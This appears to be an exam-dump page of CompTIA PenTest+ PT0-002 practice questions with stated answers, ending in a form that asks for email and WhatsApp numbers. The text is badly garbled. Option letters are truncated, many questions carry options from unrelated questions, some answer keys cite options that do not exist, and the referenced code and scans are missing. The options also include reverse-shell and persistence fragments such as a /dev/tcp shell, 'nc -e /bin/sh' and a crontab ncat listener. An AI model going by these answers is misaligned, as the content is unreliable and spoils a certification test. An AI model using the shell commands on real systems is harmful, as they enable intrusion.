DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

Updated CompTIA PenTest+ PT0-002 Exam Dumps – Your Path to Success

For the CompTIA PenTest+ PT0-002 certification, utilizing reliable exam resources is paramount for thorough exam preparation. Access to a vast pool of accurate practice test questions and answers enables you to identify knowledge gaps and strengthen areas of weakness. Reputable study materials, including comprehensive study guides and video courses, provide in-depth explanations of penetration testing concepts. Mock exams simulating the real test environment help you gain familiarity with the exam format and manage time effectively. Regular practice with these exam resources bolsters your confidence and enhances your ability to apply penetration testing methodologies during the actual exam. Combining high-quality study materials, practice tests, and mock exams equips you with the necessary skills and knowledge to pass the CompTIA PenTest+ PT0-002 exam successfully.
Take other online exams

Question #1
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.Which of the following steps should the tester take NEXT?
A. ee explanation below
View answer
Correct Answer: A
Question #2
Deconfliction is necessary when the penetration test:
A. etermines that proprietary information is being stored in cleartext
B. ccurs during the monthly vulnerability scanning
C. ncovers indicators of prior compromise over the course of the assessment
D. roceeds in parallel with a criminal digital forensic investigation
View answer
Correct Answer: D
Question #3
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
A. penVAS
B. ikto
C. QLmap
D. essus
View answer
Correct Answer: C
Question #4
A penetration tester has been given eight business hours to gain access to a client's financial system.Which of the following techniques will have the HIGHEST likelihood of success?
A. ttempting to tailgate an employee who is going into the client's workplace
B. ropping a malicious USB key with the company's logo in the parking lot
C. sing a brute-force attack against the external perimeter to gain a foothold
D. erforming spear phishing against employees by posing as senior management
View answer
Correct Answer: D
Question #5
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. LCs will not act upon commands injected over the network
B. upervisors and controllers are on a separate virtual network by default
C. ontrollers will not validate the origin of commands
D. upervisory systems will detect a malicious injection of code/commands
View answer
Correct Answer: C
Question #6
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:Which of the following commands should the penetration tester run post-engagement?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ג€apacheג€ /F
View answer
Correct Answer: B
Question #7
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?
A. heck the scoping document to determine if exfiltration is within scope
B. top the penetration test
C. scalate the issue
D. nclude the discovery and interaction in the daily report
View answer
Correct Answer: C
Question #8
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. hodan
B. map
C. ebScarab-NG
D. essus
View answer
Correct Answer: A
Question #9
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. ireshark
B. ircrack-ng
C. ismet
D. ifite
View answer
Correct Answer: B
Question #10
The results of an Nmap scan are as follows:Which of the following would be the BEST conclusion about this device?
A. larify the statement of work
B. btain an asset inventory from the client
C. nterview all stakeholders
D. dentify all third parties involved
View answer
Correct Answer: B
Question #11
The following line-numbered Python code snippet is being used in reconnaissance:Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS?
A. ine 01
B. ine 02
C. ine 07
D. ine 08
E. ine 12
View answer
Correct Answer: A
Question #12
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. nsupported operating systems
B. usceptibility to DDoS attacks
C. nability to network
D. he existence of default passwords
View answer
Correct Answer: D
Question #13
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address.Which of the following MOST likely describes what happened?
A. he penetration tester was testing the wrong assets
B. he planning process failed to ensure all teams were notified
C. he client was not ready for the assessment to start
D. he penetration tester had incorrect contact information
View answer
Correct Answer: B
Question #14
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. map -sT -vvv -O 192
B. map -sV 192
C. map -sA -v -O 192
D. map -sS -O 192
View answer
Correct Answer: D
Question #15
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. ommand injection
B. roken authentication
C. irect object reference
D. ross-site scripting
View answer
Correct Answer: C
Question #16
A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)
A. lickjacking
B. ession hijacking
C. arameter pollution
D. ookie hijacking
E. ross-site scripting
View answer
Correct Answer: CD
Question #17
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
A. aximizing the likelihood of finding vulnerabilities
B. eprioritizing the goals/objectives
C. liminating the potential for false positives
D. educing the risk to the client environment
View answer
Correct Answer: B
Question #18
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
A. niff and then crack the WPS PIN on an associated WiFi device
B. ump the user address book on the device
C. reak a connection between two Bluetooth devices
D. ransmit text messages to the device
View answer
Correct Answer: A
Question #19
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. xecutive summary of the penetration-testing methods used
B. ill of materials including supplies, subcontracts, and costs incurred during assessment
C. uantitative impact assessments given a successful software compromise
D. ode context for instances of unsafe typecasting operations
View answer
Correct Answer: D
Question #20
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. dit the discovered file with one line of code for remote callback
B. ownload
C. dit the smb
D. ownload the smb
View answer
Correct Answer: C
Question #21
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.Which of the following was captured by the testing team?
A. ultiple handshakes
B. P addresses
C. ncrypted file transfers
D. ser hashes sent over SMB
View answer
Correct Answer: D
Question #22
HOTSPOT (Drag and Drop is not supported)You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.INSTRUCTIONGiving the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.Hot Area:
A. ee Explanation section for answer
View answer
Correct Answer: A
Question #23
A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?
A. map -iL results 192
B. map 192
C. map -A 192
D. map 192
View answer
Correct Answer: C
Question #24
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
A. teganography
B. etadata removal
C. ncryption
D. ncode64
View answer
Correct Answer: A
Question #25
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:Which of the following commands should the penetration tester run post-engagement?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ?€apache?€ /F
View answer
Correct Answer: B
Question #26
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
View answer
Correct Answer: A
Question #27
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
A. murf
B. ing flood
C. raggle
D. ing of death
View answer
Correct Answer: C
Question #28
Which of the following situations would MOST likely warrant revalidation of a previous security assessment?
A. fter detection of a breach
B. fter a merger or an acquisition
C. hen an organization updates its network firewall configurations
D. hen most of the vulnerabilities have been remediated
View answer
Correct Answer: B
Question #29
A penetration tester ran a ping `"A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. indows
B. pple
C. inux
D. ndroid
View answer
Correct Answer: A
Question #30
A penetration tester ran the following commands on a Windows server:Which of the following should the tester do AFTER delivering the final report?
A. elete the scheduled batch job
B. lose the reverse shell connection
C. owngrade the svsaccount permissions
D. emove the tester-created credentials
View answer
Correct Answer: D
Question #31
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?
A. ashcat
B. imikatz
C. atator
D. ohn the Ripper
View answer
Correct Answer: C
Question #32
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. signed statement of work
B. he correct user accounts and associated passwords
C. he expected time frame of the assessment
D. he proper emergency contacts for the client
View answer
Correct Answer: D
Question #33
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools?(Choose two.)
A. OW
B. LA
C. OE
D. DA
View answer
Correct Answer: BC
Question #34
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
A. dd a dependency checker into the tool chain
B. erform routine static and dynamic analysis of committed code
C. alidate API security settings before deployment
D. erform fuzz testing of compiled binaries
View answer
Correct Answer: A
Question #35
An Nmap scan of a network switch reveals the following:Which of the following technical controls will most likely be the FIRST recommendation for this device?
A. ncrypted passwords
B. ystem-hardening techniques
C. ultifactor authentication
D. etwork segmentation
View answer
Correct Answer: B
Question #36
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
A. ait for the next login and perform a downgrade attack on the server
B. apture traffic using Wireshark
C. erform a brute-force attack over the server
D. se an FTP exploit against the server
View answer
Correct Answer: B
Question #37
Appending string values onto another string is called:
A. ompilation
B. onnection
C. oncatenation
D. onjunction
View answer
Correct Answer: C
Question #38
A compliance-based penetration test is primarily concerned with:
A. btaining PII from the protected network
B. ypassing protection on edge devices
C. etermining the efficacy of a specific set of security standards
D. btaining specific information from the protected network
View answer
Correct Answer: C
Question #39
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. eb archive
B. itHub
C. ile metadata
D. nderground forums
View answer
Correct Answer: A
Question #40
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk?
A. c 10
B. owershell -exec bypass -f \\\\10
C. ash -i >& /dev/tcp/10
D. get 10
View answer
Correct Answer: A
Question #41
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
A. evices produce more heat and consume more power
B. evices are obsolete and are no longer available for replacement
C. rotocols are more difficult to understand
D. evices may cause physical world effects
View answer
Correct Answer: D
Question #42
A penetration tester is attempting to discover live hosts on a subnet quickly.Which of the following commands will perform a ping scan?
A. map -sn 10
B. map -sV -A 10
C. map -Pn 10
D. map -sT -p- 10
View answer
Correct Answer: A
Question #43
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?
A. he HTTP port is not open on the firewall
B. he tester did not run sudo before the command
C. he web server is using HTTPS instead of HTTP
D. his URI returned a server error
View answer
Correct Answer: D
Question #44
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
A. un an application vulnerability scan and then identify the TCP ports used by the application
B. un the application attached to a debugger and then review the application's log
C. isassemble the binary code and then identify the break points
D. tart a packet capture with Wireshark and then run the application
View answer
Correct Answer: D
Question #45
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:Which of the following combinations of tools would the penetration tester use to exploit this script?
A. ydra and crunch
B. etcat and cURL
C. urp Suite and DIRB
D. map and OWASP ZAP
View answer
Correct Answer: B
Question #46
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?
A. nderstanding the tactics of a security intrusion can help disrupt them
B. cripts that are part of the framework can be imported directly into SIEM tools
C. he methodology can be used to estimate the cost of an incident better
D. he framework is static and ensures stability of a security program over time
View answer
Correct Answer: A
Question #47
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?
A. ailgating
B. umpster diving
C. houlder surfing
D. adge cloning
View answer
Correct Answer: D
Question #48
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. dit the discovered file with one line of code for remote callback
B. ownload
C. dit the smb
D. ownload the smb
View answer
Correct Answer: AC
Question #49
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.Which of the following methods will MOST likely work?
A. ry to obtain the private key used for S/MIME from the CEO's account
B. end an email from the CEO's account, requesting a new account
C. ove laterally from the mail server to the domain controller
D. ttempt to escalate privileges on the mail server to gain root access
View answer
Correct Answer: D
Question #50
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. security compliance regulations or laws may be violated
B. testing can make detecting actual APT more challenging
C. testing adds to the workload of defensive cyber- and threat-hunting teams
D. business and network operations may be impacted
View answer
Correct Answer: D
Question #51
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
A. ecurity compliance regulations or laws may be violated
B. esting can make detecting actual APT more challenging
C. esting adds to the workload of defensive cyber- and threat-hunting teams
D. usiness and network operations may be impacted
View answer
Correct Answer: D
Question #52
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
A. pecially craft and deploy phishing emails to key company leaders
B. un a vulnerability scan against the company's external website
C. untime the company's vendor/supply chain
D. crape web presences and social-networking sites
View answer
Correct Answer: D
Question #53
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment?
A. sset inventory
B. NS records
C. eb-application scan
D. ull scan
View answer
Correct Answer: A
Question #54
A penetration tester wants to scan a target network without being detected by the client's IDS.Which of the following scans is MOST likely to avoid detection?
A. end deauthentication frames to the stations
B. erform jamming on all 2
C. et the malicious AP to broadcast within dynamic frequency selection channels
D. odify the malicious AP configuration to not use a preshared key
View answer
Correct Answer: C
Question #55
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. c 10
B. owershell -exec bypass -f \\10
C. ash -i >& /dev/tcp/10
D. get 10
View answer
Correct Answer: D
Question #56
A penetration tester captured the following traffic during a web-application test:Which of the following methods should the tester use to visualize the authorization information being transmitted?
A. ecode the authorization header using UTF-8
B. ecrypt the authorization header using bcrypt
C. ecode the authorization header using Base64
D. ecrypt the authorization header using AES
View answer
Correct Answer: C
Question #57
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.Which of the following can be used to ensure the tester is able to maintain access to the system?
A. chtasks /create /sc /ONSTART /tr C:\\Temp|WindowsUpdate
B. mic startup get caption,command
C. rontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null
D. udo useradd -ou 0 -g 0 user
View answer
Correct Answer: A
Question #58
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
A. nalyze the malware to see what it does
B. ollect the proper evidence and then remove the malware
C. o a root-cause analysis to find out how the malware got in
D. emove the malware immediately
E. top the assessment and inform the emergency contact
View answer
Correct Answer: E
Question #59
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?
A. QLmap
B. irBuster
C. 3af
D. WASP ZAP
View answer
Correct Answer: D
Question #60
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. urp Suite
B. irBuster
C. PScan
D. WASP ZAP
View answer
Correct Answer: C
Question #61
A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
View answer
Correct Answer: B
Question #62
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted dat
A. hether sensitive client data is publicly accessible
B. hether the connection between the cloud and the client is secure
C. hether the client's employees are trained properly to use the platform
D. hether the cloud applications were developed using a secure SDLC
View answer
Correct Answer: A
Question #63
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.Which of the following is most important for the penetration tester to defin
A. stablish the format required by the client
B. stablish the threshold of risk to escalate to the client immediately
C. stablish the method of potential false positives
D. stablish the preferred day of the week for reporting
View answer
Correct Answer: B
Question #64
A penetration tester obtained the following results after scanning a web server using the dirb utility:Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. ndex
B. bout
C. nfo
D. ome
View answer
Correct Answer: B
Question #65
A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. amiliarity and likeness
B. uthority and urgency
C. carcity and fear
D. ocial proof and greed
View answer
Correct Answer: B
Question #66
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
A. cceptance by the client and sign-off on the final report
B. cheduling of follow-up actions and retesting
C. ttestation of findings and delivery of the report
D. eview of the lessons during the engagement
View answer
Correct Answer: A
Question #67
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift.Which of the following social-engineering attacks was the tester utilizing?
A. hishing
B. ailgating
C. aiting
D. houlder surfing
View answer
Correct Answer: C
Question #68
A company becomes concerned when the security alarms are triggered during a penetration test.Which of the following should the company do NEXT?
A. alt the penetration test
B. onduct an incident response
C. econflict with the penetration tester
D. ssume the alert is from the penetration test
View answer
Correct Answer: C
Question #69
A penetration tester gains access to a system and is able to migrate to a user process:Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
A. he tester input the incorrect IP address
B. he command requires the ג€"port 135 option
C. n account for RDP does not exist on the server
D. owerShell requires administrative privilege
View answer
Correct Answer: CD
Question #70
Which of the following expressions in Python increase a variable val by one? (Choose two.)
A. map ג€"T3 192
B. map ג€"P0 192
C. map ג€"T0 192
D. map ג€"A 192
View answer
Correct Answer: CF
Question #71
A penetration tester runs the unshadow command on a machine.Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
View answer
Correct Answer: A
Question #72
SIMULATIONYou are a penetration tester reviewing a client's website through a web browser.INSTRUCTIONSReview all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. ee explanation below
View answer
Correct Answer: A
Question #73
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.Which of the following is the BEST action for the penetration tester to take?
A. tilize the tunnel as a means of pivoting to other internal devices
B. isregard the IP range, as it is out of scope
C. top the assessment and inform the emergency contact
D. can the IP range for additional systems to exploit
View answer
Correct Answer: C
Question #74
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A. Weak authentication schemes
B. Credentials stored in strings
C. Buffer overflows
D. Non-optimized resource management
View answer
Correct Answer: C
Question #75
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
View answer
Correct Answer: A
Question #76
A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
A. orensically acquire the backdoor Trojan and perform attribution
B. tilize the backdoor in support of the engagement
C. ontinue the engagement and include the backdoor finding in the final report
D. nform the customer immediately about the backdoor
View answer
Correct Answer: D
Question #77
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.Which of the following changes should the tester apply to make the script work as intended?
A. hange line 2 to $ip= ג€10
B. emove lines 3, 5, and 6
C. emove line 6
D. ove all the lines below line 7 to the top of the script
View answer
Correct Answer: A
Question #78
A consulting company is completing the ROE during scoping.Which of the following should be included in the ROE?
A. ost of the assessment
B. eport distribution
C. esting restrictions
D. iability
View answer
Correct Answer: C
Question #79
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network?
A. c 10
B. sh 10
C. c 127
D. sh 127
View answer
Correct Answer: C
Question #80
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A. reate a one-shot system service to establish a reverse shell
B. btain /etc/shadow and brute force the root password
C. un the nc ג€"e /bin/sh <ג€¦> command
D. ove laterally to create a user account on LDAP
View answer
Correct Answer: A
Question #81
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment?
A. artially known environment testing
B. nown environment testing
C. nknown environment testing
D. hysical environment testing
View answer
Correct Answer: C
Question #82
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?
A. he timing of the scan
B. he bandwidth limitations
C. he inventory of assets and versions
D. he type of scan
View answer
Correct Answer: C
Question #83
A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?
A. Familiarity and likeness
B. Authority and urgency
C. Scarcity and fear
D. Social proof and greed
View answer
Correct Answer: B
Question #84
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. xploiting a configuration weakness in the SQL database
B. ntercepting outbound TLS traffic
C. aining access to hosts by injecting malware into the enterprise-wide update server
D. everaging a vulnerability on the internal CA to issue fraudulent client certificates
E. stablishing and maintaining persistence on the domain controller
View answer
Correct Answer: A
Question #85
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. his device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory
B. his device is most likely a gateway with in-band management services
C. his device is most likely a proxy server forwarding requests over TCP/443
D. his device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation
View answer
Correct Answer: BE
Question #86
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.Which of the following would BEST support this task?
A. un nmap with the -O, -p22, and -sC options set against the target
B. un nmap with the -sV and -p22 options set against the target
C. un nmap with the --script vulners option set against the target
D. un nmap with the -sA option set against the target
View answer
Correct Answer: D
Question #87
A penetration tester is scanning a corporate lab network for potentially vulnerable services.Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. map 192
B. map 192
C. map 192
D. map 192
View answer
Correct Answer: C
Question #88
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. DA
B. SA
C. OW
D. OU
View answer
Correct Answer: C

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number: